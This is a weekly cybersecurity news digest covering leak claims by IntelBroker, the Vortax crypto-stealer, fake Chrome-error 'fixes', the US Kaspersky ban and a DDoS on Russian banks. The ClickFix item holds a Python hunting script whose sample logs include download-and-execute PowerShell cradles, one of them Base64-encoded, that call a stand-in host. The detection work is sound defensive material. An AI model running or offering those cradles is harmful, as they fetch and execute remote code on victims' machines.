Cybersecurity Highlights: Tech Giants' Secrets for Monero and a Crypto Thief Disguised as a Messenger

We have compiled the most significant cybersecurity news of the week.

  • Hacker IntelBroker claimed leaks at AMD, Apple, Atlassian, and T-Mobile.
  • A fraudulent messenger for stealing cryptocurrency spread online.
  • Fake errors in Google Chrome were used to install a hidden cryptominer.
  • Kaspersky antivirus was banned in the US.

Hacker IntelBroker Claims Leaks at AMD, Apple, Atlassian, and T-Mobile

IntelBroker, a hacker known in cybercriminal circles, has been offering alleged leaks from several major companies for sale over the past few days.

He first published a data dump from chip manufacturer AMD. According to the hacker, the archive contains unreleased corporate solutions, client and employee information, software source codes, and financial data.

The seller did not specify the price or source of the files.

Source: BreachForums.

AMD told Bleeping Computer that it is investigating the potential incident with law enforcement.

In other posts, IntelBroker offers for sale:

  • an exploit for remote code execution (RCE) in Atlassian’s Jira for 800,000 Monero (over $127 million at the time of writing);
  • the source code of several Apple corporate tools;
  • confidential data from telecommunications company T-Mobile, including administrator access to the Confluence server and internal Slack channels for developers.

T-Mobile representatives denied any system compromise, calling the published screenshots of their infrastructure outdated and likely stolen from a third-party service provider.

Fraudulent Messenger for Cryptocurrency Theft Spreads Online

Researchers at Recorded Future studied large-scale attacks on cryptocurrency holders using the Vortax malware, disguised as a virtual meeting application.

To lend legitimacy to the malware, its operator, identified as markopolo, maintains a dedicated blog on Medium and a verified X-account with a gold checkmark.

Inviting users from Discord to a call in Vortax. Source: Recorded Future.

Vortax delivers several info-stealers, including ones targeting macOS. Once inside a victim’s system, the malware not only drains cryptocurrency wallets but also harvests any available credentials for resale.

Fake Errors in Google Chrome Used to Install Hidden Cryptominer

Cybercriminals created pop-ups with fake errors in Google Chrome, Microsoft Word, and OneDrive to trick users into running malicious PowerShell “fixes.” This was reported by researchers at Proofpoint.

The discovered payloads include the XMRig cryptominer, the Lumma Stealer for cryptocurrency wallets and other information, the DarkGate and NetSupport remote access trojans, the Matanbuchus malicious loader, and the Amadey Loader botnet.

Attack chain. Source: Proofpoint.

In one scenario, users are redirected to a compromised site that loads a malicious script retrieved from the blockchain via Binance Smart Chain smart contracts.
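The "fix" the fake error asks the user to paste is a PowerShell one-liner, so the cheapest place to catch the chain is process-creation or RunMRU telemetry showing PowerShell launched from a user-facing parent with a hidden window, a policy bypass, an encoded command, or a download-and-execute cradle. The hunt below is an added example (not code from the page, from Proofpoint, or from any of the named malware families) that scores constructed command lines against those traits; the clipboard-wipe and DNS-flush indicators are assumptions about typical decoy actions in such chains and only count as supporting signals, and the sample records are constructed, not real telemetry.

```python
import base64
import re

# Indicators for the fake-"fix" one-liners the Proofpoint write-up describes:
# PowerShell started with a hidden window, the execution policy bypassed, and a
# download-and-execute cradle. clipboard_wipe and dns_flush are assumed decoy
# actions for this kind of chain (not taken from the page) and are only
# supporting signals in the verdict below.
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "policy_bypass": re.compile(r"-(?:ep|exec|executionpolicy)\s+bypass", re.I),
    "download_cradle": re.compile(
        r"\b(?:iwr|irm)\b|invoke-webrequest|invoke-restmethod"
        r"|net\.webclient|downloadstring|downloadfile", re.I),
    "invoke_expression": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "clipboard_wipe": re.compile(r"set-clipboard|clear-clipboard", re.I),
    "dns_flush": re.compile(r"ipconfig\s+/flushdns", re.I),
}
# -e / -ec / -enc / -EncodedCommand followed by a Base64 blob (UTF-16LE script).
ENCODED_ARG = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(cmdline):
    """Return the plaintext of a -EncodedCommand argument, or None if absent/undecodable."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_command(cmdline):
    """Match indicators against the command line and its decoded payload, if any."""
    encoded = ENCODED_ARG.search(cmdline) is not None
    decoded = decode_encoded_command(cmdline)
    # Scan the decoded script in place of the Base64 blob: the blob's characters
    # must neither trigger an indicator by chance nor hide the real payload.
    text = ENCODED_ARG.sub(" ", cmdline)
    if decoded is not None:
        text += "\n" + decoded
    hits = (["encoded_command"] if encoded else []) + [
        name for name, rx in INDICATORS.items() if rx.search(text)
    ]
    suspicious = (
        ("download_cradle" in hits and "invoke_expression" in hits)
        or ("encoded_command" in hits and "hidden_window" in hits)
        or len(hits) >= 3
    )
    return {"hits": hits, "decoded": decoded, "suspicious": suspicious}


# Constructed payload for the encoded-command sample (example.invalid is a reserved name).
_ENCODED_PAYLOAD = base64.b64encode(
    "Invoke-Expression (New-Object Net.WebClient)"
    ".DownloadString('http://example.invalid/a')".encode("utf-16-le")
).decode("ascii")

# Constructed process-creation records, not real telemetry: parent process and command line.
SAMPLE_LOG = [
    'parent=explorer.exe cmd=powershell.exe -w hidden -ep bypass -c "iwr http://example.invalid/fix.ps1 | iex"',
    f"parent=explorer.exe cmd=powershell.exe -NoP -W Hidden -Enc {_ENCODED_PAYLOAD}",
    'parent=cmd.exe cmd=powershell.exe -NoProfile -Command "Get-Service | Where-Object Status -eq Running"',
    r"parent=services.exe cmd=powershell.exe -ExecutionPolicy Bypass -File C:\Deploy\install.ps1",
    "parent=explorer.exe cmd=cmd.exe /c ipconfig /flushdns",
]


def hunt(records):
    """Return the suspicious records together with their matched indicators."""
    findings = []
    for rec in records:
        parent, _, cmdline = rec.partition(" cmd=")
        result = score_command(cmdline)
        if result["suspicious"]:
            findings.append({"parent": parent.removeprefix("parent="), "cmdline": cmdline, **result})
    return findings


if __name__ == "__main__":
    for finding in hunt(SAMPLE_LOG):
        print(finding["parent"], finding["hits"], (finding["decoded"] or "")[:40])
```

Only the two constructed ClickFix-style records are flagged; the signed deployment script with a lone execution-policy bypass and the bare DNS flush each score a single supporting hit and stay below the verdict threshold, which is the trade-off to tune against your own baseline of legitimate PowerShell use.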

Kaspersky Antivirus Banned in the US

On June 20, the administration of US President Joe Biden announced an upcoming ban on Kaspersky Lab’s antivirus software and the distribution of updates for it among American companies and consumers.

The decision is driven by “an unacceptable risk to US national security” due to the developer company’s ties to the Russian government.

American users of Kaspersky Antivirus are advised to find alternative cybersecurity software by September 29, 2024.

Russia Adopts “Right to Be Forgotten” Law

On June 19, the Federation Council approved a law requiring all search engines to ensure the “right to be forgotten” online, and banning search results from foreign sites that violate Russian laws. This was reported by TASS.

At the request of Roskomnadzor, search engine operators must connect to the registry of information resources with restricted access within 30 working days and stop returning results for such sites within three working days.

Ukrainian Hackers Attack Banks and Payment Systems in Russia

On June 20, the IT ARMY of Ukraine conducted a large-scale DDoS attack on the Russian financial system, causing disruptions in major companies.

Among those affected were VTB, Sberbank, T-Bank (formerly Tinkoff), Alfa-Bank, Beeline, MTS, Rostelecom, Gazprombank, MegaFon, FPS, NPCS, UISC, and others.

Source: IT ARMY of Ukraine.

Representatives of NPCS, the operator of the “Mir” payment cards, confirmed the incident and issues with service access.

According to them, the attack was carpet-bombing in nature, causing “all border network equipment to overload and network connectivity to be disrupted.”

Also on ForkLog:

  • Tourists warned about AI-driven phishing.
  • Kenya halted the investigation into Worldcoin.
  • Bug hunters withdrew $3 million from Kraken due to an “extremely critical” vulnerability. Later, CertiK claimed involvement in this “white” hack.
  • A Taiwanese resident was accused of placing bets on the Polymarket crypto platform.
  • The Russian Prosecutor General announced control over cross-border cryptocurrency movements.
  • Hamster Kombat players targeted by scammers.
  • The Central Bank of Russia proposed freezing suspicious digital ruble transactions, while police warned of a new CBDC scam.
  • A hacker with $27 million in bitcoins was arrested in Spain.
  • A money laundering scheme through e-CNY was uncovered in China.
  • Hackers sent Remilia assets worth $4.3 million to Tornado Cash.

What to Read This Weekend?

Alongside a guest author, we explore why on-chain analytics tools sometimes err in marking suspicious transactions.
